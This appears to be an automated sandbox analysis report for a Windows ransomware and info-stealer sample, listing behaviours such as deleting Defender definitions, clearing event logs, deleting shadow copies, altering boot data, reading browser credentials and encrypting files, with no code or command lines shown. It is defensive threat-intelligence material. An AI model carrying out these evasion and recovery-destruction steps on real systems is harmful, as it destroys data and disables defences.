56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747

Analysis

max time kernel
47s
max time network
147s
platform
windows10_x64
resource
win10-en-20211104
submitted
22-11-2021 11:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
Size

3.5MB
MD5

d63d3afed4c1975a7e31906e0e163305
SHA1

b3f4e45ef92c5ec76bfdaeb3a19071db65ddd7c0
SHA256

56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747
SHA512

3c92f0cb5e63620919d7ab412741396fb0f65558a621c4328a69a33ada732f80d03548d3cd88734cd4bc038a7b7c240ecfe61a1f56ead387f04c700fe7d6c1be

Score

10^/10

evasion ransomware spyware stealer trojan

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
evasion

Impair Defenses
T1562

Command-Line Interface
T1059

Processes:

MpCmdRun.exe

pid process

4040 MpCmdRun.exe
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Clears Windows event logs 1 TTPs
evasion ransomware

Indicator Removal on Host
T1070
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

836 bcdedit.exe
960 bcdedit.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
4040	MpCmdRun.exe

pid	process
836	bcdedit.exe
960	bcdedit.exe

Drops file in Program Files directory 64 IoCs

Processes:

56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe

description	ioc	process
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-openide-execution.jar.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_Kok7cyRH9GI0.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\Bibliography\Style\APASixthEditionOfficeOnline.xsl.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_cD8T1Ta62_w0.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\jawt.lib.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_KT5X_5a-7ng0.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkTSFrame.png.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_ntooEAG4iZw0.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-output2_ja.jar.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_4jUnHW99lhU0.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Cartridges\hive.xsl.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_j-cpD3pkizM0.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification.ja_5.5.0.165303.jar.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_npbZbbC2RkQ0.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\MondoR_ConsumerSub_Bypass30-ul-oob.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_De-XDsvHc1I0.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\OneNoteR_Trial-ul-oob.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_QUkGLHmyjpg0.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019R_OEM_Perp-ul-oob.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_d8Cy0Om_DC00.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019MSDNR_Retail-ul-oob.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_GDrrLnl9Qm80.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_OEM_Perp2-pl.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_wCvXV_5SRPY0.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_Retail-pl.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_RzqTxXV8Kh00.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-editor-mimelookup-impl.jar.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_uzyBLha6YqQ0.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_OEM_Perp-ul-phn.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_kOnEkEP7zlc0.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_Trial-pl.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_Ft1jep0weOc0.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring_zh_CN.jar.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_6UJFVa8n4dQ0.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp3-ul-oob.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_L1T_0PpmhVM0.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\7-Zip\Lang\gl.txt.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_aCT1E--oNV40.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019VL_MAK_AE-pl.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_e0Tnv6nKEIs0.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Garamond-TrebuchetMs.xml.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_rKVjXBzkZ8k0.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019VL_MAK_AE-ul-phn.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_CQzeRR2fwuc0.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.DOC.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_mWUWhy92l7M0.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-core_zh_CN.jar.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_xeZSbC3iybQ0.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Microsoft Office\Office16\SLERROR.XML.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_ZU9T9t9bg6w0.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-core.xml.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_44KiIgGyeQ00.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_Subscription4-pl.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_yqlu-bFum4E0.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp6-pl.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_Notcfg4qpYI0.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlusVL_KMS_Client-ul-oob.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_FJifcPY7R4g0.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019XC2RVL_KMS_ClientC2R-ul.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_dkQg7KluZ7Q0.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019XC2RVL_MAKC2R-ul-oob.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_MV08c-xl9Hw0.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler_1.2.0.v20140422-1847.jar.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_jQVu31dwSks0.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\diagnostic-command-16.png.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_ZKbhH-LHKsg0.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\locale\boot_zh_CN.jar.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_TT-plhxUakI0.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-openide-modules.xml.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_aXouNT_C5lM0.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\MondoR_EnterpriseSub_Bypass30-ppd.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_wHJ-I32sPWU0.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MSIPC\pt-BR\msipc.dll.mui.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_v38_5O1F3nw0.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\ffjcext.zip.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_gytsf4yPnRs0.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse_2.1.200.v20140512-1650.jar.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_or80xOB3Mhs0.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-modules-applemenu.xml.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_8IzliHU8rzo0.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\org-netbeans-core-output2.xml_hidden.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_twxsgTk7dgE0.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdO365R_Subscription-pl.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_68mHLYPLW5o0.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019XC2RVL_MAKC2R-ul-phn.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_RmR5Q16n4As0.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioProDemoR_BypassTrial180-ppd.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_UWGXPRHMXOg0.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\ClientVolumeLicense2019_eula.txt.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_aL5WYqhk_mg0.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\help.gif.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j__k3kKwu3MQQ0.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\logging.properties.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_vt7KtdL0pGI0.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest4-pl.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_ebbVWqMyOms0.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectProCO365R_SubTest-ppd.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_xO0owbzLK-M0.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\ExcelNaiveBayesCommandRanker.txt.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_HGC-zZvWTJY0.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\1033\SQLENGINEMESSAGES.XML.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_HqPgqWRhKL80.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jetty.io_8.1.14.v20131031.jar.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_2FZLzCayFfg0.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Internet Explorer\fr-FR\ieinstal.exe.mui	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\linesstylish.dotx.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_SqhIAZhMlLc0.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\7-Zip\Lang\lt.txt.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_XROsxkszWI00.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectProR_Retail-ppd.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_iSxK_PUAqD80.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Standard2019VL_MAK_AE-ul-oob.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_85Ysf6D7XCU0.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.Office.PowerPivot.ExcelAddIn.tlb.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_A9dCVY_pS_o0.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-masterfs-nio2.xml.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_ic7Tf1zmC400.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\license.html.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_RK4AzX452iI0.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Retail-ppd.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_axQpdrm92c40.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\EXPTOOWS.XLA.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_1IA_NJHZS7I0.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\security\cacerts.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_r0Y8Ro3reHo0.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectProO365R_SubTest-ul-oob.xrm-ms.eYRbqVdH62TQKepiUbGE6D1C6oA9VJ16_5BVOdigq2j_bT1e6oe7tn00.cggbt	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

1324 vssadmin.exe
Runs net.exe

pid	process
1324	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exepowershell.exe56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe

pid	process
2208	powershell.exe
2208	powershell.exe
2208	powershell.exe
1584	powershell.exe
1584	powershell.exe
1584	powershell.exe
2876	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
2876	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exe

description	pid	process
Token: SeSecurityPrivilege	3688	wevtutil.exe
Token: SeBackupPrivilege	3688	wevtutil.exe
Token: SeSecurityPrivilege	820	wevtutil.exe
Token: SeBackupPrivilege	820	wevtutil.exe
Token: SeSecurityPrivilege	1288	wevtutil.exe
Token: SeBackupPrivilege	1288	wevtutil.exe
Token: SeIncreaseQuotaPrivilege	916	wmic.exe
Token: SeSecurityPrivilege	916	wmic.exe
Token: SeTakeOwnershipPrivilege	916	wmic.exe
Token: SeLoadDriverPrivilege	916	wmic.exe
Token: SeSystemProfilePrivilege	916	wmic.exe
Token: SeSystemtimePrivilege	916	wmic.exe
Token: SeProfSingleProcessPrivilege	916	wmic.exe
Token: SeIncBasePriorityPrivilege	916	wmic.exe
Token: SeCreatePagefilePrivilege	916	wmic.exe
Token: SeBackupPrivilege	916	wmic.exe
Token: SeRestorePrivilege	916	wmic.exe
Token: SeShutdownPrivilege	916	wmic.exe
Token: SeDebugPrivilege	916	wmic.exe
Token: SeSystemEnvironmentPrivilege	916	wmic.exe
Token: SeRemoteShutdownPrivilege	916	wmic.exe
Token: SeUndockPrivilege	916	wmic.exe
Token: SeManageVolumePrivilege	916	wmic.exe
Token: 33	916	wmic.exe
Token: 34	916	wmic.exe
Token: 35	916	wmic.exe
Token: 36	916	wmic.exe
Token: SeIncreaseQuotaPrivilege	660	wmic.exe
Token: SeSecurityPrivilege	660	wmic.exe
Token: SeTakeOwnershipPrivilege	660	wmic.exe
Token: SeLoadDriverPrivilege	660	wmic.exe
Token: SeSystemProfilePrivilege	660	wmic.exe
Token: SeSystemtimePrivilege	660	wmic.exe
Token: SeProfSingleProcessPrivilege	660	wmic.exe
Token: SeIncBasePriorityPrivilege	660	wmic.exe
Token: SeCreatePagefilePrivilege	660	wmic.exe
Token: SeBackupPrivilege	660	wmic.exe
Token: SeRestorePrivilege	660	wmic.exe
Token: SeShutdownPrivilege	660	wmic.exe
Token: SeDebugPrivilege	660	wmic.exe
Token: SeSystemEnvironmentPrivilege	660	wmic.exe
Token: SeRemoteShutdownPrivilege	660	wmic.exe
Token: SeUndockPrivilege	660	wmic.exe
Token: SeManageVolumePrivilege	660	wmic.exe
Token: 33	660	wmic.exe
Token: 34	660	wmic.exe
Token: 35	660	wmic.exe
Token: 36	660	wmic.exe
Token: SeIncreaseQuotaPrivilege	660	wmic.exe
Token: SeSecurityPrivilege	660	wmic.exe
Token: SeTakeOwnershipPrivilege	660	wmic.exe
Token: SeLoadDriverPrivilege	660	wmic.exe
Token: SeSystemProfilePrivilege	660	wmic.exe
Token: SeSystemtimePrivilege	660	wmic.exe
Token: SeProfSingleProcessPrivilege	660	wmic.exe
Token: SeIncBasePriorityPrivilege	660	wmic.exe
Token: SeCreatePagefilePrivilege	660	wmic.exe
Token: SeBackupPrivilege	660	wmic.exe
Token: SeRestorePrivilege	660	wmic.exe
Token: SeShutdownPrivilege	660	wmic.exe
Token: SeDebugPrivilege	660	wmic.exe
Token: SeSystemEnvironmentPrivilege	660	wmic.exe
Token: SeRemoteShutdownPrivilege	660	wmic.exe
Token: SeUndockPrivilege	660	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exe

description	pid	process	target process
PID 2876 wrote to memory of 3592	2876	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe	net.exe
PID 2876 wrote to memory of 3592	2876	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe	net.exe
PID 3592 wrote to memory of 3824	3592	net.exe	net1.exe
PID 3592 wrote to memory of 3824	3592	net.exe	net1.exe
PID 2876 wrote to memory of 3524	2876	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe	net.exe
PID 2876 wrote to memory of 3524	2876	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe	net.exe
PID 3524 wrote to memory of 3588	3524	net.exe	net1.exe
PID 3524 wrote to memory of 3588	3524	net.exe	net1.exe
PID 2876 wrote to memory of 520	2876	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe	net.exe
PID 2876 wrote to memory of 520	2876	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe	net.exe
PID 520 wrote to memory of 1152	520	net.exe	net1.exe
PID 520 wrote to memory of 1152	520	net.exe	net1.exe
PID 2876 wrote to memory of 852	2876	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe	net.exe
PID 2876 wrote to memory of 852	2876	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe	net.exe
PID 852 wrote to memory of 2452	852	net.exe	net1.exe
PID 852 wrote to memory of 2452	852	net.exe	net1.exe
PID 2876 wrote to memory of 680	2876	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe	net.exe
PID 2876 wrote to memory of 680	2876	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe	net.exe
PID 680 wrote to memory of 3680	680	net.exe	net1.exe
PID 680 wrote to memory of 3680	680	net.exe	net1.exe
PID 2876 wrote to memory of 1252	2876	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe	net.exe
PID 2876 wrote to memory of 1252	2876	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe	net.exe
PID 1252 wrote to memory of 2772	1252	net.exe	net1.exe
PID 1252 wrote to memory of 2772	1252	net.exe	net1.exe
PID 2876 wrote to memory of 3384	2876	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe	net.exe
PID 2876 wrote to memory of 3384	2876	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe	net.exe
PID 3384 wrote to memory of 1492	3384	net.exe	net1.exe
PID 3384 wrote to memory of 1492	3384	net.exe	net1.exe
PID 2876 wrote to memory of 608	2876	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe	net.exe
PID 2876 wrote to memory of 608	2876	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe	net.exe
PID 608 wrote to memory of 716	608	net.exe	net1.exe
PID 608 wrote to memory of 716	608	net.exe	net1.exe
PID 2876 wrote to memory of 976	2876	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe	net.exe
